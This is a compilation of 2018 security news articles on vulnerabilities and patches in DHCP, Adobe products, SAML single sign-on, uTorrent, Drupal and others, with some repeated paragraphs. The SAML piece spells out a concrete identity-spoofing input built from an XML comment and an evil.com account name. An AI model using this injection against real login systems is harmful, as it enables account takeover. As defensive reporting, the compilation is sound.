“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.


Remotely Exploitable Flaws Patched in DHCP
1.3.2018 securityweek
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for the Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP Client (dhclient), which provides a means for configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious server to cause the client to crash.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.


Emerson Patches Severe Flaw in ControlWave Controllers
1.3.2018 securityweek
Vulnerebility

Automation solutions provider Emerson has patched a potentially serious denial-of-service (DoS) vulnerability in its ControlWave Micro Process Automation Controller product.

ControlWave Micro Process Automation Controller is a hybrid remote terminal unit (RTU)/programmable logic controller (PLC) used around the world, particularly in the energy, and water and wastewater systems sectors.

According to an advisory published this week by ICS-CERT, this Emerson product is affected by a high severity stack-based buffer overflow vulnerability that can be exploited to force the device to enter “halt mode” by sending specially crafted packets on port 20547.Emerson fixes vulnerability in ControlWave Process Automation Controller

Emerson fixes vulnerability in ControlWave Process Automation Controller

“Exploitation may possibly cause a halt of Ethernet functionality, requiring a cold start to restore the system as well as communications related to ControlWave Designer access. This can possibly result in a loss of system availability and disruption in communications with other connected devices,” ICS-CERT said in its advisory.

The flaw, tracked as CVE-2018-5452, affects ControlWave Micro controllers running version 05.78.00 and prior of the firmware. Emerson patched the vulnerability with the release of version 05.79.00.

The security hole was reported to Emerson by Nozomi Networks, a company that specializes in cybersecurity and visibility solutions for industrial control systems (ICS). The firm, which recently raised $15 million in a Series B funding round, said it did not take long to find the flaw using a process it developed for testing ICS devices.

Moreno Carullo, co-founder and CTO of Nozomi, told SecurityWeek that the vulnerability can be exploited remotely over the Internet against devices that have port 20547 open. A Shodan search conducted by the company showed 163 potentially vulnerable devices, mainly in the United States, Canada and Mexico.

Carullo said the vulnerability was reported to Emerson in October 2017 and it was patched after roughly two months, which he described as “relatively fast compared to others.”


Siemens Releases BIOS Updates to Patch Intel Chip Flaws
28.2.2018 securityweek
Vulnerebility

Siemens has released BIOS updates for several of its industrial devices to patch vulnerabilities discovered recently in Intel chips, including Meltdown, Spectre and flaws affecting the company’s Management Engine technology.

Following the disclosure of the Meltdown and Spectre attack methods, industrial control systems (ICS) manufacturers immediately started analyzing the impact of the flaws on their products. Advisories have been published by companies such as Siemens, Rockwell Automation, Schneider Electric, ABB, and Pepperl+Fuchs.

Siemens has determined that the security holes expose many of its product lines to attacks, including RUGGEDCOM, SIMATIC, SIMOTION, SINEMA, and SINUMERIK.

The company informed customers recently that it has started releasing BIOS updates for some of its impacted products, including SIMATIC industrial PCs, SIMATIC field PG rugged laptops, SIMATIC industrial tablet PCs (ITP), and SINUMERIK panel control units (PCU). In addition to firmware patches, users have been advised to install operating system updates, which should mitigate the Meltdown flaw and one variant of Spectre.

The BIOS updates released by the company for the aforementioned SIMATIC and SINUMERIK devices also patch several vulnerabilities discovered last year by researchers in Intel’s Management Engine (ME), Server Platform Services (SPS), and Trusted Execution Engine (TXE) technologies.

The flaws impacting these Intel products can be exploited – in most cases locally, but at least one bug is remotely exploitable – for arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.

The firmware updates from Siemens also fix a vulnerability affecting the Trusted Platform Module (TPM) in chips made by German semiconductor manufacturer Infineon.

The flaw, CVE-2017-15361, is related to the RSA library in TPM and it could allow a remote attacker who knows the public key to obtain the private RSA key. The security hole affects the products of several major tech firms, including Microsoft, Google, HP, Lenovo and Fujitsu.

Siemens has published separate advisories to inform users about the availability of patches for Meltdown/Spectre, Intel ME, and Infineon TPM vulnerabilities. ICS-CERT has so far published an advisory only for the Infineon issue.


Talos experts shared details of a remote code execution flaw in Adobe Acrobat Reader DC
28.2.2018 securityweek
Vulnerebility

Security experts at Cisco Talos disclosed details of a remote code execution flaw that affects Adobe Acrobat Reader DC versions 2018.009.20050 and 2017.011.30070 and earlier.
Security experts at Cisco Talos shared details of a remote code execution vulnerability tracked as CVE-2018-4901, that affects Adobe Acrobat Reader DC.

A remote attacker can exploit the vulnerability tricking the victim into opening a malicious file or visiting a specially crafted webpage.

The flaw affects Adobe Acrobat Reader versions 2018.009.20050 and 2017.011.30070 and earlier. The vulnerability was disclosed on Dec. 7 and Adobe addressed it a few days ago, on February 13.

“Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.” reads the analysis published by the Talos team.

Adobe classified the flaw with a “priority 2” level that equals to “important”, this means that there is an “elevated risk” of exploitation. The good news is that there are currently no known exploits in the wild.

The researchers explained that the flaw could be used by attackers to embed a malicious JavaScript code in a PDF file to use document ID to perform unauthorized operations to trigger a stack-based buffer overflow when opening a specially crafted PDF document.

“A specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader,” continues Talos.

Researchers at Talos also released Snort rules 45102-3 that could be used by administrators to detect exploitation attempts.


Intel Releases Spectre Patches for Broadwell, Haswell CPUs
28.2.2018 securityweek 
Vulnerebility

Intel has released new firmware updates for its Broadwell and Haswell processors to address the Spectre vulnerability.

After the first round of Spectre patches released by the company caused more frequent reboots and other instability problems, Intel started working on new microcode updates.

The company first released new firmware updates for its Skylake processors, and last week it announced the availability of patches for several other CPUs, including Kaby Lake and Coffee Lake.

This week, the company updated the list of available firmware patches to state that the fixes for Haswell and Broadwell processors are also ready for use in production environments.

As of February 28, patches that can be deployed in production environments are available for the following products: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broadwell (except Server EX), Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Haswell (except Server EX), Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches have been provided to OEMs for validation for Gladden, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The microcode updates for Broadwell and Haswell Server EX processors, specifically the Xeon E7v4 and E7v3 product families, are also in beta phase.

As for the remaining CPUs, updates are either in pre-beta or planning phase, but pre-mitigation microcode updates are available for many of these products.

The patches will be delivered as OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but a majority of firms decided to halt the updates due to instability issues. Some vendors have now resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel and AMD claim they are working on processors that will have built-in protections against these types of exploits.

Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.


Recently patched CVE-2018-4878 Adobe Flash Player flaw now exploited by cybercriminals
28.7.2018 securityaffairs
Vulnerebility

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.
Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was used by North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability has been exploited by other threat actors in the wild as confirmed by Morphisec. The company spotted a campaign on February 22, the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that exploited the CVE-2018-4878 in a malspam campaign, another thing highlighted by the researchers is that this exploit did not have a 64-bit version like the original one.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz. Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

If the user enables the editing mode, the CVE-2018-4878 Adobe vulnerability is exploited and the Windows command prompt is executed. The associated cmd[.]exe file is then injected with malicious shellcode that connects to the attacker’s domain.

Security researchers at Morphisec have uncovered a massive hacking campaign that is exploiting the recently patched CVE-2018-4878 Adobe Flash Player vulnerability.

Threat actors are exploiting the use-after-free flaw to deliver malware.

The CVE-2018-4878 vulnerability was fixed by Adobe on February 6, after security experts discovered it was used by North Korea-linked APT37 group in targeted attacks against South Korea.

Now the same vulnerability has been exploited by other threat actors in the wild as confirmed by Morphisec. The company spotted a campaign on February 22, the attackers were using a version of the exploit similar to the one used by the APT37 group.

The campaign is attributed to a financially motivated threat actor that exploited the CVE-2018-4878 in a malspam campaign, another thing highlighted by the researchers is that this exploit did not have a 64-bit version like the original one.

The attackers used spam emails containing a link to a document stored on safe-storage[.]biz.

The URLs included in the emails is generated with Google’s URL shortening service, this circumstance allowed the researchers to determine the number of victims that clicked it. According to Morphisec each of the different links used in this campaign had been clicked tens and even hundreds of times within 3-4 days of being created.

Once downloaded and opened, the document tries to trick victims with social engineering. It notifies users that an online preview is not available and instructs them to enable editing mode in order to view the content.

CVE-2018-4878 malspam

If the user enables the editing mode, the CVE-2018-4878 Adobe vulnerability is exploited and the Windows command prompt is executed. The associated cmd[.]exe file is then injected with malicious shellcode that connects to the attacker’s domain.

“On February 22, 2018, Morphisec Labs spotted several malicious word documents exploiting the latest Flash vulnerability CVE-2018-4878 in the wild in a massive malspam campaign.” states the analysis published by Morphisec.

“After downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a cmd[.]exe which is later remotely injected with a malicious shellcode that connects back to the malicious domain.”

Then the shellcode downloads a dll from the same domain, which is executed using Microsoft Register Server utility to bypass whitelisting solutions.

According to the experts, only a limited number of security solutions flag the bait documents as malicious.

“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible. With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.” concluded Morphisec.


Widespread Vulnerability Found in Single-Sign-On Products
27.7.2018 securityweek
Vulnerebility

A behavioral quirk in SAML libraries has left many single-sign-on (SSO) implementations vulnerable to abuse. It allows an attacker that has gained any authenticated access to trick the system into granting further access as a different user without knowledge of that user's password.

This could be used by an attacker who has compromised a low level limited access account to acquire access to third-party cloud services -- or it could be used by a malicious insider seeking access to reserved network areas (such as the payroll databases, or HR records).

The vulnerability was discovered by the research team of Duo Security, itself an SSO provider; and is described in a blog posted today. It affects many of the leading SSO providers, and probably affects the majority of proprietary company SSO developments.

Duo has confirmed the flaw in OneLogin - python-saml (CVE-2017-11427); OneLogin - ruby-saml (CVE-2017-11428); Clever - saml2-js (CVE-2017-11429); OmniAuth-SAML (CVE-2017-11430); Shibboleth (CVE-2018-0489); and Duo Network Gateway (CVE-2018-7340).

Security Assertion Markup Language (SAML) is the underlying protocol used by most SSO implementations. It is what allows authentication to be passed between a company's identity store and, for example, a third-party service. Typically, a user will log onto the identity store. This contains the credentials that will allow the same user to access other services.

SAML is used to pass authentication, via the browser, from the identity provider to the third-party service, granting access. The flaw lies in how authentication is encoded by SAML in the provider's 'response'.

The SAML authentication response contains two primary elements: the assertion and the signature. The assertion element says this NameID is authenticated. The signature element is designed to prevent the authenticated user NameID being changed at any point between the identity provider and the service being accessed. "If the attacker can modify the 'NameID' without invalidating the signature, that would be bad," suggest the Duo researchers; and then proceed to explain how it can be done.

"One of the causes of this vulnerability is a subtle and arguably unexpected behavior of XML libraries like Python’s 'lxml' or Ruby’s 'REXML'," write the blog's authors. Comments can be included in the signature, but the canonicalization process of the SAML libraries tend to drop all text after the first text node to isolate the NameID.

"So," explain the researchers, "as an attacker with access to the account 'user@user.com.evil.com', I can modify *my own* SAML assertions to change the NameID to 'user@user.com' when processed by the SP." The seven characters are <!----> inserted before .evil.com. This causes the canonicalization process to drop '.evil.com', leaving the authenticated account as 'user@user.com'.

Not all SSO implementations are vulnerable to this glitch; but Duo has demonstrated that many are. All that is required from the attacker is a genuine account that he can 'modify' to his attack target, plus the relatively minor technical savvy to intercept and edit the SAML authentication as it passes through the browser.

"Remediation of this issue," notes the report, "somewhat depends on what relationship you have with SAML." It gets a bit complicated. "Duo has released updates for the Duo Network Gateway in version? ?1.2.10?. If you use the DNG as a SAML Service Provider and are not at version 1.2.10 or higher (at the time of writing this, 1.2.10 is the latest version), we recommend upgrading."

Different affected SSOs will have different specific recommendations, and it would be best to refer to them for guidance. Similarly, there are different recommendations for maintainers of identity or service providers, maintainers of SAML processing libraries, and maintainers of XML parsing libraries. One thing that would help, suggest the authors, is the ability to enforce multi-factor authentication, "because this vulnerability would only allow a bypass of a user’s first factor of authentication." But the authors also warn, "if your IdP is responsible for both first factor and second factor authentication, it’s likely that this vulnerability bypasses both!"

Because multiple vendors are affected by this vulnerability, Duo Security worked with CERT/CC to co-ordinate disclosure. It provided the vulnerability information to CERT/CC on 18 December 2017. By 20 February 2018, all notified affected vendors had confirmed they were ready for disclosure; and Duo Security has disclosed the vulnerability details today.

Ann Arbor, Michigan-based Duo Security, a cloud-based provider of identity and access management solutions, announced a $70 million Series D funding round led by Meritech Capital Partners and Lead Edge Capital in October 2017. This brought the total amount raised to $119 million, and valued the company at $1.17 billion.


Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely
27.2.2018 thehackernews
Vulnerebility


If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible.
Google's security researcher at Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and newly launched 'μTorrent Web' that allows users to download and stream torrents directly into their web browser.
μTorrent Classic and μTorrent Web apps run in the background on the Windows machine and start a locally hosted HTTP RPC server on ports 10000 and 19575, respectively, using which users can access its interfaces over any web browser.
However, Project Zero researcher Tavis Ormandy found that several issues with these RPC servers could allow remote attackers to take control of the torrent download software with little user interaction.
According to Ormandy, uTorrent apps are vulnerable to a hacking technique called the "domain name system rebinding" that could allow any malicious website a user visits to execute malicious code on user's computer remotely.

To execute DNS rebinding attack, one can simply create a malicious website with a DNS name that resolves to the local IP address of the computer running a vulnerable uTorrent app.
"This requires some simple DNS rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable," Ormandy explained.
Proof-of-Concept Exploits for uTorrent Software Released Publicly

Ormandy also provided proof-of-concept exploits for μTorrent Web and μTorrent desktop (1 and 2), which are capable of passing malicious commands through the domain in order to get them to execute on the targeted computer.
Last month, Ormandy demonstrated same attack technique against the Transmission BitTorrent app.
Ormandy reported BitTorrent of the issues with the uTorrent client in November 2017 with a 90-days disclosure deadline, but a patch was made public on Tuesday—that's almost 80 days after the initial disclosure.
What's more? The re-issued new security patches the same day after Ormandy found that his exploits continued to work successfully in the default configuration with a small tweak.
"This issue is still exploitable," Ormandy said. "The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway."
"I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch."
Patch your uTorrent Software NOW!
The company assured its users that all vulnerabilities reported by Ormandy it two of its products had been addressed with the release of:
μTorrent Stable 3.5.3.44358
BitTorrent Stable 7.10.3.44359
μTorrent Beta 3.5.3.44352
μTorrent Web 0.12.0.502
All users are urged to update their software immediately.


Dozen vulnerabilities discovered in Trend Micro Linux-based Email Encryption Gateway
25.2.2018 securityafffairs 
Vulnerebility

Security researchers at Core Security have discovered a dozen vulnerabilities in Trend Micro Linux-based Email Encryption Gateway.
Security researchers at Core Security have discovered a dozen flaws in Trend Micro Linux-based Email Encryption Gateway, some of them have been rated as critical and high severity. The flaws received the CVE identification numbers CVE-2018-6219 through CVE-2018-6230.

The most severe flaw could be exploited by a local or remote attacker with access to the targeted system to execute arbitrary commands with root privileges.

“Encryption for Email Gateway [1] is a Linux-based software solution providing the ability to perform the encryption and decryption of email at the corporate gateway, regardless of the email client, and the platform from which it originated. The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses,” states Core Security.

“Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway web console that would allow a remote unauthenticated attacker to gain command execution as root.”

Trend Micro Email Encryption Gateway

The most serious vulnerability is CVE-2018-6223, it is related to missing authentication for appliance registration. Administrators can configure the virtual appliance running Email Encryption Gateway during the deployment process upon deployment via a registration endpoint.

The researchers discovered that attackers can access the endpoint without authentication to set administrator credentials and make other changes to the configuration.

“The registration endpoint is provided for system administrators to configure the virtual appliance upon deployment. However, this endpoint remains accessible without authentication even after the appliance is configured, which would allow attackers to set configuration parameters such as the administrator username and password.” continues the analysis.

The experts also discovered two high severity cross-site scripting (XSS) vulnerabilities, an arbitrary file write issue that can lead to command execution, am arbitrary log file locations leading command execution, and unvalidated software updates.

Remaining flaws discovered by the researchers include SQL and XML external entity (XXE) injections.

Affected Packages are Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) and earlier, Trend Micro addressed ten of the vulnerabilities with the version 5.5 build 1129.

According to the report timeline, Trend Micro spent more than six months to issue the patches.

2017-06-05: Core Security sent an initial notification to Trend Micro, including a draft advisory.
2017-11-13: Core Security asked again (4th time) for an ETA for the official fix. We stated we need a release date or a thorough explanation on why after five months there is still no date defined. If there is no such answer we will be forced to publish the advisory.
2018-02-21: Advisory CORE-2017-0006 published.
Trend Micro confirmed that a medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched due to the difficulties of implementing a fix.


GitLab Patches Domain Hijacking Vulnerability
23.2.2018 securityweek
Vulnerebility

Open source Git repository management system GitLab has addressed a security hole that could have been exploited to hijack users’ custom domains and point them to malicious content.

GitLab Pages is a feature that allows users to create websites for their projects, groups or user accounts, and then connect them to custom domains and TLS certificates.

White hat hackers noticed that no validation was being performed to ensure that the custom domain added to a user’s Pages site was actually theirs.

A custom domain can be added to GitLab Pages by creating a new DNS A record with an IP address for a Pages server. Since no validation was performed when adding custom domains, an attacker could have identified domains with DNS records pointing to the GitLab Pages server and hijack those domains. When users visited the hijacked domains, they would have been served content from the attacker’s repository.

The attack worked against custom domains that were deleted by users but still had the DNS records for the GitLab server active.

Two researchers reported variations of this issue to GitLab via the company’s bug bounty program on HackerOne. GitLab initially decided not to fix anything, but it started taking action after the second report was submitted.

“Attacker can create fake GitLab account(s) using the email(s) from temporary/anonymous email services. Configure fake email addresses with git for further code commits. Create multiple repositories and add domain name from the vulnerable list. The attacker can then: 1) use the static websites as Command and Control centers for their malware / for other malicious intents, 2) phish the customers / visitors of the legitimate domain owners,” one of the researchers explained in the report submitted via HackerOne.

Proof-of-concept (PoC) exploits created by the researchers revealed that there had been hundreds of vulnerable domains.

GitLab initially disabled the functionality for adding custom domains to GitLab Pages, and this week it rolled out a permanent fix by requiring users to verify ownership when adding a custom domain. Verification is done by adding a DNS TXT record containing a token provided by GitLab to the user’s domain.

Some users pointed out on Hacker News that the problem is similar to the issue that caused Let’s Encrypt last month to disable TLS-SNI-01 validation.


Tech Giants Hit by Meltdown, Spectre Respond to Lawmakers
23.2.2018 securityweek
Vulnerebility

Intel, AMD, ARM, Apple, Amazon, Google and Microsoft have responded to lawmakers who raised questions last month about the disclosure of the CPU vulnerabilities known as Meltdown and Spectre.

The U.S. House Energy and Commerce Committee announced on January 24 that it had sent letters to the companies hit by the Meltdown/Spectre incident, inquiring about their disclosure process. The tech giants were instructed to respond by February 7 and their responses have now been made public.

The Meltdown and Spectre vulnerabilities, which allow malicious applications to access potentially sensitive data from memory, were discovered independently by researchers at Google and various universities and private companies. Affected vendors were first notified in June 2017 and the disclosure of the flaws was initially planned for January 9, but it was moved to January 3 after some experts figured out that operating system developers had been preparing patches for what appeared to be critical processor flaws.

The U.S. House Energy and Commerce Committee asked impacted vendors about why and who proposed an embargo, when were US-CERT and CERT/CC notified, the impact of the embargo on critical infrastructure and other technology firms, the resources and best practices used in implementing the embargo, and lessons learned regarding multi-party coordinated disclosure.

Overall, the companies said Google Project Zero, whose researchers discovered the vulnerabilities, set the embargo after consultations with affected firms. Project Zero typically gives vendors 90 days to release patches, but the deadline was significantly extended due to the “complex nature of the vulnerability and mitigations.”

None of the companies notified US-CERT and CERT/CC of Meltdown and Spectre prior to their public disclosure. The agencies learned about the flaws through the public disclosure on January 3, and US-CERT was contacted by Intel on that day and again two days later.

The companies told lawmakers that the embargo and the disclosure process were consistent with industry standard practices designed to protect the public against attacks exploiting unpatched vulnerabilities.

In response to questions regarding impact on critical infrastructure, Intel noted that “the generally understood characteristics of most [industrial control systems] suggest that risk to these systems is likely low.” Many of the major ICS vendors have published advisories to warn users of the risks associated with these attack methods.

As for lessons learned, the tech giants claim they are evaluating the situation in an effort to improve their process in the future, and many say they are open to discussions on this topic.


Dozen Flaws Found in Trend Micro Email Encryption Gateway
23.2.2018 securityweek
Vulnerebility

Researchers have discovered a dozen vulnerabilities in Trend Micro’s Email Encryption Gateway, including several issues rated critical and high severity. A majority of the flaws have been patched by the vendor.

Core Security revealed this week that its employees found several types of vulnerabilities in the Linux-based email encryption product. The most serious of the security holes can allow a local or remote attacker with access to the targeted system to execute arbitrary commands with root privileges.

Core Security has published an advisory detailing each of the vulnerabilities it has found. The flaws have been assigned the CVE identifiers CVE-2018-6219 through CVE-2018-6230.

The most serious of the flaws, rated critical based on its CVSS score, is CVE-2018-6223, an issue related to missing authentication. System admins can configure the virtual appliance running Email Encryption Gateway during the deployment process through a registration endpoint. The problem is that this endpoint can be accessed without authentication, allowing attackers to set administrator usernames and passwords and make other configuration changes.

Six of the flaws found in Email Encryption Gateway have been rated “high severity,” including an arbitrary file write issue that can lead to command execution, a couple of cross-site scripting (XSS) vulnerabilities, a command execution flaw related to arbitrary log file locations, and the lack of a validation mechanism for software updates.

Other flaws identified by Core Security researchers include SQL and XML external entity (XXE) injections.

Trend Micro informed customers that the vulnerabilities impact Email Encryption Gateway 5.5 build 1111 and earlier running on a virtual appliance. Patches for ten of the flaws are included in version 5.5 build 1129. It’s worth pointing out that it took the vendor more than half a year to release fixes.

A medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched “due to the difficulties of implementing and the negative impact on critical normal product function of the proposed resolutions.” However, Trend Micro did provide some mitigations.

The company also pointed out that the Email Encryption Gateway will reach end of life (EOL) soon and advised customers to migrate to the InterScan Messaging Security product, which provides similar features and functionality.

This was not the first time Core Security researchers discovered vulnerabilities in a Trend Micro product. Back in December, the company disclosed the details of five security holes found in Trend Micro’s Smart Protection Server product.


Meltdown patch for OpenBSD is available … let’s wait for feedbacks
23.2.2018 securityaffairs
Vulnerebility

OpenBSD releases Version 11 code update that addresses the Meltdown vulnerability by implementing the separation between the kernel and the user memory pages.
OpenBSD addresses the Meltdown vulnerability with the release of a Version 11 code. The update implements the separation between the kernel and the user memory pages.

OpenBSD’s Phillip Guenther provided further details on the implementation.

“When a syscall, trap, or interrupt takes a CPU from userspace to kernel the trampoline code switches page tables, switches stacks to the thread’s real kernel stack, then copies over the necessary bits from the trampoline stack. On return to userspace the opposite occurs: recreate the iretq frame on the trampoline stack, switch stack, switch page tables, and return to userspace.” wrote Guenther.

“Per-CPU page layout mostly inspired by DragonFlyBSD.”

Guenther explained that Per-CPU page layout mostly implemented the approach used in DragonFly BSD.

According to Gunther the impact on performance would be reduced because the approach minimizes the overhead for the management of kernel code and data in the transitions to/from the kernel.

“On Intel CPUs which speculate past user/supervisor page permission checks, use a separate page table for userspace with only the minimum of kernel code and data required for the transitions to/from the kernel.” he added.

“When a syscall, trap, or interrupt takes a CPU from userspace to kernel the trampoline code switches page tables, switches stacks to the thread’s real kernel stack, then copies over the necessary bits from the trampoline stack. On return to userspace the opposite occurs: recreate the iretq frame on the trampoline stack, switch stack, switch page tables, and return to userspace.”Meltdown OpenBSD

A couple of weeks ago, DTrace expert Brendan Gregg developed a “microbenchmark” to measure the performance degradation introduced by the Linux kernel page table isolation (KPTI) patch for the Meltdown CPU vulnerability. The tests demonstrated a degradation between 0.1 per cent and 6 per cent.

Let’s wait for the tests on OpenBSD.

Further technical details on the approach implemented for OpenBSD are available here.


Drupal addressed several vulnerabilities in Drupal 8 and 7
23.2.2018 securityaffairs
Vulnerebility

The Drupal development team addressed many vulnerabilities in both Drupal 8 and 7, including some flaws rated as “critical”.
Drupal maintainers have fixed many vulnerabilities in Drupal 7 and 8, including some flaws rated as “critical.”

One of the critical security vulnerabilities is related to partial cross-site scripting (XSS) prevention mechanisms that was addressed with Drupal 8.4.5 and 7.57 versions. The popular CMS uses a JavaScript function that doesn’t completely sanitize the input

“Drupal has a Drupal.checkPlain() JavaScript function which is used to escape potentially dangerous text before outputting it to HTML.” reads the advisory. “This function does not correctly handle all methods of injecting malicious HTML, leading to a cross-site scripting vulnerability under certain circumstances.”

The second vulnerability rated as critical affects Drupal 8, it could be exploited by users who have permission to post comments to view content and comments they should not be able to access. The flaw could also allow users to add comments to the content that should not be able to access.

The Drupal team also fixed two moderately critical vulnerabilities in Drupal 7 and other two in Drupal 8. The flaws in Drupal 7:

A Private file access bypass – Drupal fails to check if a user has access to a file before allowing the user to view or download it when the CMS is using a private file system.
A jQuery cross site scripting vulnerability that is present when making Ajax requests to untrusted domains.
while the vulnerabilities in Drupal 8 are:

A Language fallback can be incorrect on multilingual sites with node access controls. Drupal marks the untranslated version of a node as the default fallback for access queries. This fallback is used for languages that do not yet have a translated version of the created node. This can result in an access bypass vulnerability.
A Settings Tray access bypass that could be exploited by users to update certain data that they do not have the permissions for.


Several Vulnerabilities Patched in Drupal
22.2.2018 securityweek
Vulnerebility

Updates released on Wednesday for Drupal 7 and 8 patch several vulnerabilities, including issues rated “critical.” No bug fixes are included in the latest releases.

One of the critical security holes patched by Drupal 8.4.5 and 7.57 is related to incomplete cross-site scripting (XSS) prevention mechanisms.

“Drupal has a Drupal.checkPlain() JavaScript function which is used to escape potentially dangerous text before outputting it to HTML. This function does not correctly handle all methods of injecting malicious HTML, leading to a cross-site scripting vulnerability under certain circumstances,” Drupal said in its advisory.

Another critical flaw, which only affects Drupal 8, allows users who have permission to post comments to view content and comments they should not be able to access. The weakness can also be exploited to add comments to the supposedly restricted content.

While these issues are rated “critical,” it’s worth pointing out that Drupal developers use NIST’s Common Misuse Scoring System to determine the risk level, which means that “critical” is second on the severity scale, after “highly critical.”

The latest Drupal 7 update also patches two moderately critical vulnerabilities. One of them, which developers claim only occurs if a site’s configuration is unusual, is an access bypass issue that can allow users to view or download files on the private file system without Drupal checking if they have access to it.

The second moderately critical flaw in Drupal 7 is a jQuery XSS issue when making Ajax requests to untrusted domains. Drupal 8 is not affected as jQuery was updated to a newer version with the release of Drupal 8.4.0.

Two moderately critical security bugs have also been fixed in Drupal 8, including an access bypass vulnerability related to language fallback on multilingual sites, and an access bypass flaw in the Settings Tray module that could allow users to update certain data without having the necessary permissions.

Finally, Drupal 7 patches a “less critical” external link injection vulnerability that can allow an attacker to trick users into navigating to a malicious site.

Drupal developers informed users that version 8.4.5 is the last release of the 8.4.x series. Users will have to update to Drupal 8.5.0, expected to become available on March 7, to receive bug and security fixes.


Cisco Patches Critical Flaws in UCDM, ESC Products
22.2.2018 securityweek
Vulnerebility

Updates released by Cisco for its Unified Communications Domain Manager (UCDM) and Elastic Services Controller (ESC) products patch critical vulnerabilities that can be exploited by remote attackers.

According to Cisco, UCDM releases prior to 11.5(2) are affected by a flaw that allows a remote, unauthenticated attacker to bypass security protections, obtain elevated privileges, and execute arbitrary code.

“The vulnerability is due to insecure key generation during application configuration. An attacker could exploit this vulnerability by using a known insecure key value to bypass security protections by sending arbitrary requests using the insecure key to a targeted application,” Cisco said in its advisory.

The security hole is tracked as CVE-2018-0124 and it was discovered by Cisco itself during internal security testing.

A critical vulnerability was also discovered by Cisco during internal security testing in the company’s ESC product, specifically the authentication functionality of the web-based service portal.

